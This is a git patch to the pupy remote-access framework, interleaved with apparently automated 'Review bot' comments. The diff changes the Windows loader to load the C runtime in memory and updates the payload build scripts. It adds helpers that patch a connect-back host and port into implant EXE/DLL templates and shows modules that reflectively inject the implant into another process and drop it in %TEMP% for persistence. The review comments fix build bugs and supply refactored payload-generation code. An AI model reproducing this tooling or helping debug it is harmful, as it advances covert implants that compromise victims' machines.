From 390929f3165d760d2731e67b45e6e8c419d760f8 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Thu, 24 Sep 2015 20:28:25 +0200 Subject: [PATCH] msvcr90 in memory loading + code cleanup --- .gitignore | 28 ++++++++++++++++++++++++++-- client/sources/make.bat | 8 ++++++-- client/sources/makex64.bat | 7 +++++-- client/sources/pupy_load.c | 24 +++++++++++++++--------- pupy/genpayload.py | 22 +++++++++++++++++----- pupy/modules/migrate.py | 4 ++-- pupy/modules/persistence.py | 2 +- 7 files changed, 72 insertions(+), 23 deletions(-) diff --git a/.gitignore b/.gitignore index b5969083..e916ea7d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,9 +1,33 @@ -#pupy +#pupy stuff pupy/data/ pupy/.pupy_history .DS_Store -# do not ignore package files + +# do not ignore package & templates files !pupy/packages/ +!pupy/payload_templates/ + +#do not redistribute microsoft visual C++ DLLs (LICENSE) +client/sources/resources/msvcr90.dll +client/sources/resources/msvcr90_x86.dll +client/sources/resources/msvcr90_x64.dll + +#Client build related stuff +*.obj +*.lib +*.exp +*.exe +*.dll +client/sources/resources_bootloader_pyc.c +client/sources/resources_bootloader.pyc +client/sources/resources_python27_dll.c +client/sources/resources/library_compressed_string.txt +client/sources/resources/python27.dll +client/sources/resources_library_compressed_string_txt.c +client/sources/resources/library_compressed_string_x86.txt +client/sources/resources/library_compressed_string_x64.txt +client/sources/resources_msvcr90_dll.c + # Byte-compiled / optimized / DLL files __pycache__/ diff --git a/client/sources/make.bat b/client/sources/make.bat index b1569e5f..ccb40ab4 100644 --- a/client/sources/make.bat +++ b/client/sources/make.bat 
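Review bot: The `*.dll` and `*.exe` patterns added further down this hunk override the earlier `!pupy/payload_templates/` negation, so template binaries placed in that directory would still be ignored — git applies the last matching pattern, and un-ignoring a directory does not shield the files inside it from a later file-level wildcard. If the intent stated in the `# do not ignore package & templates files` comment is to track the templates, move the negation below the wildcard rules as `!pupy/payload_templates/*`, or scope the wildcards to the client tree (`client/sources/*.dll`, `client/sources/*.exe`). The three explicit `client/sources/resources/msvcr90*.dll` entries become redundant with `*.dll` but are worth keeping as documentation of the licensing reason.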
@@ -9,12 +9,15 @@ copy resources\python27_x86.dll resources\python27.dll copy resources\library_compressed_string_x86.txt resources\library_compressed_string.txt "C:\\Python27\\python.exe" gen_resource_header.py resources\library_compressed_string.txt "C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll +copy resources\msvcr90_x86.dll resources\msvcr90.dll +"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll "C:\\Python27\\python.exe" gen_python_bootloader.py "C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc ::compile them to obj files : "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_library_compressed_string_txt.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_bootloader_pyc.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_python27_dll.c +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c resources_msvcr90_dll.c ::then compile 
@@ -31,8 +34,9 @@ copy resources\library_compressed_string_x86.txt resources\library_compressed_st "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c thread.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c remote_thread.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" /c base_inject.c /IC:\Python27\include -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.exe -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx86.dll /LD +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.exe + +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj 
resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx86.dll /LD copy pupyx86.dll ..\..\pupy\payloads\ copy pupyx86.exe ..\..\pupy\payloads\ diff --git a/client/sources/makex64.bat b/client/sources/makex64.bat index bbce2e31..ea27f57b 100644 --- a/client/sources/makex64.bat +++ b/client/sources/makex64.bat @@ -10,11 +10,14 @@ copy resources\library_compressed_string_x64.txt resources\library_compressed_st copy resources\python27_x64.dll resources\python27.dll "C:\\Python27\\python.exe" gen_resource_header.py resources\python27.dll "C:\\Python27\\python.exe" gen_python_bootloader.py +copy resources\msvcr90_x64.dll resources\msvcr90.dll +"C:\\Python27\\python.exe" gen_resource_header.py resources\msvcr90.dll "C:\\Python27\\python.exe" gen_resource_header.py resources\bootloader.pyc ::compile them to obj files : "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_library_compressed_string_txt.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_bootloader_pyc.c "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_python27_dll.c +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\adm64\cl.exe" /c resources_msvcr90_dll.c ::then compile 
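Review bot: The two `copy pupyx86.* ..\..\pupy\payloads\` lines at the end of this hunk still publish the build output to `pupy/payloads/`, while the new helpers in `pupy/genpayload.py` (the `+def get_edit_pupyx86_dll` hunk) read from `payload_templates/` and the `.gitignore` hunk whitelists `pupy/payload_templates/`. As committed, a fresh build followed by running `genpayload.py` would apparently not find its templates unless they are moved by hand; the copy targets should presumably be `..\..\pupy\payload_templates\`. The same mismatch is in the second `makex64.bat` hunk (`copy pupyx64.dll ..\..\pupy\payloads\` and the `.exe` line after it).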
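Review bot: The added compile line for `resources_msvcr90_dll.c` uses the path component `\VC\Bin\adm64\cl.exe`, whereas every other command in this file uses `\VC\Bin\amd64\cl.exe`; as written that object file is not produced, and the link lines in the next hunk that now list `resources_msvcr90_dll.obj` would presumably fail. Change it to `"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c resources_msvcr90_dll.c`. Minor: the `copy`/`gen_resource_header.py` pair is inserted after `gen_python_bootloader.py` here but before it in `make.bat`; ordering is not significant, but keeping the two scripts parallel makes them easier to diff against each other.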
@@ -31,8 +34,8 @@ copy resources\python27_x64.dll resources\python27.dll "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c thread.c /D_WIN64 "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c remote_thread.c /D_WIN64 "C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" /c base_inject.c /IC:\Python27\include /D_WIN64 -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.exe /D_WIN64 -"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj /Fepupyx64.dll /LD /D_WIN64 +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_exe.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj MemoryModule.obj pupy_load.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.exe /D_WIN64 +"C:\Users\me\AppData\Local\Programs\Common\Microsoft\Visual C++ for Python\9.0\VC\Bin\amd64\cl.exe" main_reflective.c _memimporter.obj MyLoadLibrary.obj Python-dynload.obj resources_bootloader_pyc.obj resources_python27_dll.obj 
MemoryModule.obj pupy_load.obj ReflectiveLoader.obj resources_library_compressed_string_txt.obj actctx.obj pupy.obj list.obj thread.obj remote_thread.obj LoadLibraryR.obj base_inject.obj resources_msvcr90_dll.obj /Fepupyx64.dll /LD /D_WIN64 copy pupyx64.dll ..\..\pupy\payloads\ copy pupyx64.exe ..\..\pupy\payloads\ diff --git a/client/sources/pupy_load.c b/client/sources/pupy_load.c index 3ba3f51e..028f8471 100644 --- a/client/sources/pupy_load.c +++ b/client/sources/pupy_load.c @@ -17,6 +17,8 @@ extern const char resources_python27_dll_start[]; extern const int resources_python27_dll_size; extern const char resources_bootloader_pyc_start[]; extern const int resources_bootloader_pyc_size; +extern const char resources_msvcr90_dll_start[]; +extern const int resources_msvcr90_dll_size; extern const char resource_python_manifest[]; extern DL_EXPORT(void) init_memimporter(void); 
@@ -41,19 +43,22 @@ DWORD WINAPI mainThread(LPVOID lpArg) char * ppath; FILE * f; char tmp_python_dll_path[MAX_PATH]; - char tmp_manifest_path[MAX_PATH]; + //char tmp_manifest_path[MAX_PATH]; char tmp_path[MAX_PATH]; ACTCTX ctx; BOOL activated; HANDLE k32; - HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx); - BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie); - void (WINAPI *AddRefActCtx)(HANDLE hActCtx); - BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie); + //HANDLE (WINAPI *CreateActCtx)(PACTCTX pActCtx); + //BOOL (WINAPI *ActivateActCtx)(HANDLE hActCtx, ULONG_PTR *lpCookie); + //void (WINAPI *AddRefActCtx)(HANDLE hActCtx); + //BOOL (WINAPI *DeactivateActCtx)(DWORD dwFlags, ULONG_PTR ulCookie); PyGILState_STATE restore_state; - //InitializeCriticalSection(&csInit); + _load_python("msvcr90.dll", resources_msvcr90_dll_start); // needed for the python interpreter + GetTempPath(MAX_PATH, tmp_path); + //InitializeCriticalSection(&csInit); + /* k32 = LoadLibrary("kernel32"); CreateActCtx = (void*)GetProcAddress(k32, "CreateActCtxA"); ActivateActCtx = (void*)GetProcAddress(k32, "ActivateActCtx"); @@ -66,7 +71,6 @@ DWORD WINAPI mainThread(LPVOID lpArg) return 0; } - GetTempPath(MAX_PATH, tmp_path); ZeroMemory(&ctx, sizeof(ctx)); ctx.cbSize = sizeof(ACTCTX); GetTempFileName(tmp_path, "tmp", 0, tmp_manifest_path); @@ -88,12 +92,12 @@ DWORD WINAPI mainThread(LPVOID lpArg) #ifndef QUIET DeleteFile(tmp_manifest_path); #endif - + */ if(!Py_IsInitialized) { int res=0; - activated = ActivateActCtx(MyActCtx, &actToken); + //activated = ActivateActCtx(MyActCtx, &actToken); if(!_load_python("python27.dll", resources_python27_dll_start)){ #ifndef QUIET @@ -177,11 +181,13 @@ DWORD WINAPI mainThread(LPVOID lpArg) //if (PyErr_Occurred()) // PyErr_Print(); Py_Finalize(); + /* if (!DeactivateActCtx(0, actToken)){ #ifndef QUIET printf("LOADER: Error deactivating context!\n!"); #endif } + */ //DeleteCriticalSection(&csInit); return 0; 
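Review bot: The activation-context code in this hunk and in the `@@ -177` hunk is disabled by wrapping it in `/* … */` and `//` rather than deleted, which leaves `ctx`, `activated` and `k32` declared with no live use visible in these hunks and makes `mainThread` read as two interleaved versions of itself; version control already preserves the old path, so removing the dead code (or guarding it with a named `#ifdef` if it is expected to come back) would be cleaner. The new `_load_python("msvcr90.dll", …)` call also discards its return value while the `python27.dll` call a few lines below checks it, so the trailing comment should at least say why that difference is intended, e.g. `// VC9 runtime from the embedded resource, loaded before python27.dll; replaces the manifest/activation-context code below`. `mainThread` begins and ends outside this hunk.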
diff --git a/pupy/genpayload.py b/pupy/genpayload.py index f5737a12..d7c11182 100755 --- a/pupy/genpayload.py +++ b/pupy/genpayload.py @@ -19,6 +19,18 @@ import argparse import sys import os.path +def get_edit_pupyx86_dll(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx86.dll"), host, ip) + +def get_edit_pupyx64_dll(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx64.dll"), host, ip) + +def get_edit_pupyx86_exe(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx86.exe"), host, ip) + +def get_edit_pupyx64_exe(host, ip): + return get_edit_binary(os.path.join("payload_templates","pupyx64.exe"), host, ip) + def get_edit_binary(path, host, ip): binary=b"" with open(path, 'rb') as f: 
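Review bot: The four new `get_edit_pupy*` wrappers differ only in the template filename, and each names its third parameter `ip` although every call site on this page passes a port (`args.port`, `port`) and `get_edit_binary` forwards it unchanged. Routing them through one private helper keeps the template directory in a single place and gives the new functions a docstring; the public names and positional signatures are unchanged, so the callers in `migrate.py` and `persistence.py` are unaffected. Note also that `os.path.join("payload_templates", …)` is resolved against the current working directory rather than this module's location, which matters now that other modules import these helpers — anchoring on `os.path.dirname(__file__)` would remove that dependency, though I have not verified how the modules are launched.
```python
_TEMPLATES_DIR = "payload_templates"

def _get_edit_template(name, host, port):
    """Return the bundled template *name* patched with the connect-back host and port."""
    return get_edit_binary(os.path.join(_TEMPLATES_DIR, name), host, port)

def get_edit_pupyx86_dll(host, port):
    return _get_edit_template("pupyx86.dll", host, port)

def get_edit_pupyx64_dll(host, port):
    return _get_edit_template("pupyx64.dll", host, port)

# … unchanged pattern: get_edit_pupyx86_exe / get_edit_pupyx64_exe …
```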
@@ -45,35 +57,35 @@ def get_edit_binary(path, host, ip): if __name__=="__main__": parser = argparse.ArgumentParser(description='Process some integers.') - parser.add_argument('-t', '--type', default='exe_x86', help="exe_x86/dll_x86 exe_x64/dll_x64 (default: exe_x86)") + parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)") parser.add_argument('-o', '--output', help="output path") parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)") parser.add_argument('host', help="connect back host") args=parser.parse_args() outpath=None if args.type=="exe_x86": - binary=get_edit_binary(os.path.join("payloads","pupyx86.exe"), args.host, args.port) + binary=get_edit_pupyx86_exe(args.host, args.port) outpath="pupyx86.exe" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="exe_x64": - binary=get_edit_binary(os.path.join("payloads","pupyx64.exe"), args.host, args.port) + binary=get_edit_pupyx64_exe(args.host, args.port) outpath="pupyx64.exe" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="dll_x64": - binary=get_edit_binary(os.path.join("payloads","pupyx64.dll"), args.host, args.port) + binary=get_edit_pupyx64_dll(args.host, args.port) outpath="pupyx64.dll" if args.output: outpath=args.output with open(outpath, 'wb') as w: w.write(binary) elif args.type=="dll_x86": - binary=get_edit_binary(os.path.join("payloads","pupyx86.dll"), args.host, args.port) + binary=get_edit_pupyx86_dll(args.host, args.port) outpath="pupyx86.dll" if args.output: outpath=args.output diff --git a/pupy/modules/migrate.py b/pupy/modules/migrate.py index 14cb3f25..e2a250bd 100644 --- a/pupy/modules/migrate.py +++ b/pupy/modules/migrate.py 
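Review bot: The four `if args.type == …` branches now differ only in which helper they call and in the default filename, and each repeats the same `outpath` / `args.output` / `open` sequence; since `--type` is restricted with `choices=` in this same hunk, a lookup table keyed by the type collapses the chain to a single code path and makes adding a template a one-line change. The `with open(...)` / `w.write` lines of the last branch fall outside the hunk, so the replacement below covers the whole chain including those.
```python
    args=parser.parse_args()
    # type -> (generator, default output name); keys mirror the --type choices
    generators = {
        "exe_x86": (get_edit_pupyx86_exe, "pupyx86.exe"),
        "exe_x64": (get_edit_pupyx64_exe, "pupyx64.exe"),
        "dll_x64": (get_edit_pupyx64_dll, "pupyx64.dll"),
        "dll_x86": (get_edit_pupyx86_dll, "pupyx86.dll"),
    }
    generate, default_name = generators[args.type]
    binary = generate(args.host, args.port)
    outpath = args.output or default_name
    with open(outpath, 'wb') as w:
        w.write(binary)
```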
@@ -39,10 +39,10 @@ class MigrateModule(PupyModule): if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid): isProcess64bits=True self.success("process is 64 bits") - dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port) + dllbuff=genpayload.get_edit_pupyx64_dll(host, port) else: self.success("process is 32 bits") - dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port) + dllbuff=genpayload.get_edit_pupyx86_dll(host, port) self.success("injecting DLL in target process %s ..."%args.pid) self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits) self.success("DLL injected !") diff --git a/pupy/modules/persistence.py b/pupy/modules/persistence.py index 9b9af87f..9f08aeb6 100644 --- a/pupy/modules/persistence.py +++ b/pupy/modules/persistence.py @@ -27,7 +27,7 @@ class PersistenceModule(PupyModule): self.info("generating exe ...") #generating exe - exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port) + exebuff=genpayload.get_edit_pupyx86_exe(host, port) remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))]))) self.info("uploading to %s ..."%remote_path)